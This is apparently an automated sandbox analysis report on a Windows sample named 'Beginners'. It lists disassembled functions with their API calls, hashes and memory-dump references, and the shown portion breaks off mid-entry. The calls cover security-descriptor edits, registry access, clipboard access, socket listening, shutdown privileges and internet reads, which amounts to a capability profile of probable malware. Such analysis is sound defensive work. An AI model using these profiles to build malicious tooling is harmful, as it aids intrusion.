                                          • Instruction ID: 72f37478ad4eccd7a68b97faee0fb08a84a9a4d150280c0c822cd8c289a82683
                                          • Opcode Fuzzy Hash: 725f6d7cacdbd1f5179c32ecf9bc5720ab45f9785322fed5aebf2fc054f9e68c
                                          • Instruction Fuzzy Hash: A631D47650461ABADB24DFB5DC88AEE77AC9F09321F140179E904E21F1DB70CED6CA60
                                          Function 001088CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00108E3C
                                            • Part of subcall function 00108E20: GetLastError.KERNEL32(?,00108900,?,?,?), ref: 00108E46
                                            • Part of subcall function 00108E20: GetProcessHeap.KERNEL32(00000008,?,?,00108900,?,?,?), ref: 00108E55
                                            • Part of subcall function 00108E20: HeapAlloc.KERNEL32(00000000,?,00108900,?,?,?), ref: 00108E5C
                                            • Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00108E73
                                            • Part of subcall function 00108EBD: GetProcessHeap.KERNEL32(00000008,00108916,00000000,00000000,?,00108916,?), ref: 00108EC9
                                            • Part of subcall function 00108EBD: HeapAlloc.KERNEL32(00000000,?,00108916,?), ref: 00108ED0
                                            • Part of subcall function 00108EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00108916,?), ref: 00108EE1
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00108931
                                          • _memset.LIBCMT ref: 00108946
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00108965
                                          • GetLengthSid.ADVAPI32(?), ref: 00108976
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 001089B3
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001089CF
                                          • GetLengthSid.ADVAPI32(?), ref: 001089EC
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001089FB
                                          • HeapAlloc.KERNEL32(00000000), ref: 00108A02
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00108A23
                                          • CopySid.ADVAPI32(00000000), ref: 00108A2A
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00108A5B
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00108A81
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00108A95
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 0dd04aae73d5d972d9f0d309a07ff25df3251bf94d0659ce8ac9c9f738801903
                                          • Instruction ID: 68f8e07329aa9b3c69aba92c6aa0332823000da683f1250b7a396845f0f0c817
                                          • Opcode Fuzzy Hash: 0dd04aae73d5d972d9f0d309a07ff25df3251bf94d0659ce8ac9c9f738801903
                                          • Instruction Fuzzy Hash: B4614975A00209FFDF01DFA5DC45AAEBB79FF48304F04812AF995A76A0DB719A04CB60
                                          Function 00130A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00130B0C
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00130BAB
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00130C43
                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00130E82
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00130E8F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: c62e32a14eda82b75f6517cd196d2e1d1f9f8807c10c1cc9822ac533cd0396b0
                                          • Instruction ID: 5cc7d936d4c5a97e47fed83b850bc213cac968cd2525e875797f9cfe73b975e2
                                          • Opcode Fuzzy Hash: c62e32a14eda82b75f6517cd196d2e1d1f9f8807c10c1cc9822ac533cd0396b0
                                          • Instruction Fuzzy Hash: 8DE14E35204211AFC715DF25C895E6ABBE9EF89714F04896DF48ADB2A2DB30ED01CB52
                                          Function 0011443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __swprintf.LIBCMT ref: 00114451
                                          • __swprintf.LIBCMT ref: 0011445E
                                            • Part of subcall function 000D38C8: __woutput_l.LIBCMT ref: 000D3921
                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00114488
                                          • LoadResource.KERNEL32(?,00000000), ref: 00114494
                                          • LockResource.KERNEL32(00000000), ref: 001144A1
                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 001144C1
                                          • LoadResource.KERNEL32(?,00000000), ref: 001144D3
                                          • SizeofResource.KERNEL32(?,00000000), ref: 001144E2
                                          • LockResource.KERNEL32(?), ref: 001144EE
                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0011454F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                          • String ID:
                                          • API String ID: 1433390588-0
                                          • Opcode ID: 144fe6b38a3cfbc817aa208733ff2225cc43dd37859f612fd67ce9ce5663d6ff
                                          • Instruction ID: 9550ebb3b75f9e1c2c164cdae4f2d476757737e14e987bcd5d41bf719647af2f
                                          • Opcode Fuzzy Hash: 144fe6b38a3cfbc817aa208733ff2225cc43dd37859f612fd67ce9ce5663d6ff
                                          • Instruction Fuzzy Hash: 6F31CF7550121AABCB159FB1EC48EFB7BB9EF09701F004425FA06D6551DB70DAA1CBB0
                                          Function 00124830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: f844dd1a2974bbb02457cb4566d32a6802acc8f356ee2ee67634da49202b872c
                                          • Instruction ID: 3f29f2d746f20369695180338fdee82ab81a093211845ae164dffceb7118ad8a
                                          • Opcode Fuzzy Hash: f844dd1a2974bbb02457cb4566d32a6802acc8f356ee2ee67634da49202b872c
                                          • Instruction Fuzzy Hash: AB21F9356052109FDB02AF61EC49F6E77A8EF48720F018019FE06D76B2CB70AD90CB94
                                          Function 0011FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0011FA83
                                          • FindClose.KERNEL32(00000000), ref: 0011FB96
                                            • Part of subcall function 000B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B52E6
                                          • Sleep.KERNEL32(0000000A), ref: 0011FAB3
                                          • _wcscmp.LIBCMT ref: 0011FAC7
                                          • _wcscmp.LIBCMT ref: 0011FAE2
                                          • FindNextFileW.KERNEL32(?,?), ref: 0011FB80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 2185952417-438819550
                                          • Opcode ID: 0fa745c7ba1218e54ad43fc66022b2142fb3c5874ce4b152f2ea54518337c092
                                          • Instruction ID: e2ade42805ee1e6d05daab6ec96888beb505d1970a7f5a172489845b5e8ef81e
                                          • Opcode Fuzzy Hash: 0fa745c7ba1218e54ad43fc66022b2142fb3c5874ce4b152f2ea54518337c092
                                          • Instruction Fuzzy Hash: F54183B590421A9FCF19DF64CC55AEEBBB4FF09350F14417AE814A32A1EB309E85CB50
                                          Function 00115778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00109399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001093E3
                                            • Part of subcall function 00109399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00109410
                                            • Part of subcall function 00109399: GetLastError.KERNEL32 ref: 0010941D
                                          • ExitWindowsEx.USER32(?,00000000), ref: 001157B4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: 9043b462e40f5131698393b40bfc01d74db2897058a73b545aa2551d8a997517
                                          • Instruction ID: 23e73a7a5de72ec86b687bed0743592772a569ed867791be77af2c3775c7cedc
                                          • Opcode Fuzzy Hash: 9043b462e40f5131698393b40bfc01d74db2897058a73b545aa2551d8a997517
                                          • Instruction Fuzzy Hash: 5601F231754722EAE72C63A9DC8BBFB7659EB85740FA40139F953D60E2EB605C808160
                                          Function 0012696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001269C7
                                          • WSAGetLastError.WSOCK32(00000000), ref: 001269D6
                                          • bind.WSOCK32(00000000,?,00000010), ref: 001269F2
                                          • listen.WSOCK32(00000000,00000005), ref: 00126A01
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00126A1B
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00126A2F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: 34f8eada4be5967f78e0be7f8e44ee53f486936e0977654881cfef4fc90a0fc7
                                          • Instruction ID: 1c82bef4c74ad4e25827f4872ee25e97989a8134881f4243adb93386aec8d47c
                                          • Opcode Fuzzy Hash: 34f8eada4be5967f78e0be7f8e44ee53f486936e0977654881cfef4fc90a0fc7
                                          • Instruction Fuzzy Hash: 812123346002119FCB00EF64DC89BAEB7B9EF49720F118558F956A73E2CB70AC50CB91
                                          Function 000B1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 000B1DD6
                                          • GetSysColor.USER32(0000000F), ref: 000B1E2A
                                          • SetBkColor.GDI32(?,00000000), ref: 000B1E3D
                                            • Part of subcall function 000B166C: DefDlgProcW.USER32(?,00000020,?), ref: 000B16B4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ColorProc$LongWindow
                                          • String ID:
                                          • API String ID: 3744519093-0
                                          • Opcode ID: 0ba48b6bcbacc8eb5230c4f55c2aebb850c59770ad2e58ad24702cb460cc3597
                                          • Instruction ID: 63da7ea3087c894069471f06b3cb25cef5b12c6f23cd9373b3c64aa3082baa94
                                          • Opcode Fuzzy Hash: 0ba48b6bcbacc8eb5230c4f55c2aebb850c59770ad2e58ad24702cb460cc3597
                                          • Instruction Fuzzy Hash: 01A15975109444BEDB3CAB6A9C69EFF39DDDB46301FA4011AF402EA1D6DB20DD41C2B6
                                          Function 0011C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011C329
                                          • _wcscmp.LIBCMT ref: 0011C359
                                          • _wcscmp.LIBCMT ref: 0011C36E
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0011C37F
                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0011C3AF
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                          • String ID:
                                          • API String ID: 2387731787-0
                                          • Opcode ID: 39995a3ce20db51f76815ec508472ec34f8baf8788adcd78b0fd632525306978
                                          • Instruction ID: d8376406b2db6e711698d5c5bf88a51d260277b6291790aa3bc8aec8d36a5df4
                                          • Opcode Fuzzy Hash: 39995a3ce20db51f76815ec508472ec34f8baf8788adcd78b0fd632525306978
                                          • Instruction Fuzzy Hash: CC517C756046029FD718DF68D490EEAB3E4FF49314F10462DF96A877A2DB30AD44CB91
                                          Function 00126E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00128475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001284A0
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00126E89
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00126EB2
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00126EEB
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00126EF8
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00126F0C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 99427753-0
                                          • Opcode ID: e082ff95d2bb50441558cb3bfd476f4acb045825ef51b03c4d38ba6e9412492e
                                          • Instruction ID: 50e3dec3c7d54fc1fd948515d97e162cd96f4cdae6bfe33fc650f949439c772a
                                          • Opcode Fuzzy Hash: e082ff95d2bb50441558cb3bfd476f4acb045825ef51b03c4d38ba6e9412492e
                                          • Instruction Fuzzy Hash: BC41D175A00610AFDB14AF64DC86FBE77A8DF08710F058458FA45AB3D3DB749E008BA1
                                          Function 001359B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: 923e21595c474acbac8b55aa6d24a7aa6b4b3208df03c2d5b758c13dc6426b71
                                          • Instruction ID: 5eaf106c6e0d08699f809bcbf9eccac138347e790e58b40c380ee90e75368a33
                                          • Opcode Fuzzy Hash: 923e21595c474acbac8b55aa6d24a7aa6b4b3208df03c2d5b758c13dc6426b71
                                          • Instruction Fuzzy Hash: 281157323009119FE7221F268C80BAE7B9AFF48B20F014129F846D7242CB30ED01CAE0
                                          Function 000F0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LocalTime__swprintf
                                          • String ID: %.3d$WIN_XPe
                                          • API String ID: 2070861257-2409531811
                                          • Opcode ID: dbb6c017822ae0489647d18c532e73251e25e7110310be4503197fa390731995
                                          • Instruction ID: 1fe85b973448a8c92c1902fe447e812027e100bad6d2158ad81b1b513a01590e
                                          • Opcode Fuzzy Hash: dbb6c017822ae0489647d18c532e73251e25e7110310be4503197fa390731995
                                          • Instruction Fuzzy Hash: 9BD0127280821CEAC7259A90CD44EFD737CEB08304F144052F706E2442DB358798BA22
                                          Function 001229BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00121ED6,00000000), ref: 00122AAD
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00122AE4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: 489876feb79893f4f58263e7cfcf2d8c59e68a5328fc5e01bc1e403e2de5510d
                                          • Instruction ID: 27f9751dbf5b70ad87a291b6238fac39b883b907a903f7f452f9ef52971ec624
                                          • Opcode Fuzzy Hash: 489876feb79893f4f58263e7cfcf2d8c59e68a5328fc5e01bc1e403e2de5510d
                                          • Instruction Fuzzy Hash: 8941E571600319BFEB20DE95EC85EBFB7ACEB40754F10401AF605A7A41DB709E919B60
                                          Function 00109399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
                                            • Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001093E3
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00109410
                                          • GetLastError.KERNEL32 ref: 0010941D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                          • String ID:
                                          • API String ID: 1922334811-0
                                          • Opcode ID: d9a0042a7bf114767b22a8b7a6713787230e0559ea124983509c9b186279e2ef
                                          • Instruction ID: 27e8fc2110d2542f6d11f1c57a190b79c533e06af99097d1cf5b2abd93b786af
                                          • Opcode Fuzzy Hash: d9a0042a7bf114767b22a8b7a6713787230e0559ea124983509c9b186279e2ef
                                          • Instruction Fuzzy Hash: 3A1191B1414305AFD728EF64EC85D6BB7BCFB48750B20852EF49997691EB70AC41CB60
                                          Function 00114254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00114271
                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001142B2
                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001142BD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
